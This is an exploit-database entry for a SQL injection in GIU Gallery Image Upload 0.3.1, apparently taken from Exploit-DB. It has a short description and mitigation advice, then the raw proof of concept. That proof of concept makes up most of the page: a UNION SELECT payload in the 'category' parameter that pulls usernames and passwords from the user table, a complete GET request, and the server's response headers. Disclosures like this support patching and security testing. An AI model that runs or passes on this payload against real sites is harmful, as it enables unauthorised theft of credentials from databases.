GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection

vendor:

GIU Gallery Image Upload

by:

Ihsan Sencan

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: GIU Gallery Image Upload

Affected Version From: 0.3.1

Affected Version To: 0.3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:tradesouthwest:giu_gallery_image_upload:0.3.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

GIU Gallery Image Upload 0.3.1 – ‘category’ SQL Injection

GIU Gallery Image Upload 0.3.1 is vulnerable to a SQL injection vulnerability in the 'category' parameter. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input in the 'category' parameter. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This will allow the attacker to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection
# Dork: N/A
# Date: 2018-10-16
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://tradesouthwest.com
# Software Link: https://sourceforge.net/projects/giugalleryimageupload/
# Version: 0.3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?category=[SQL]

%27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+-

GET /[PATH]/index.php?category=Image%20Gallery%27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 16 Oct 2018 00:23:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 2300
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8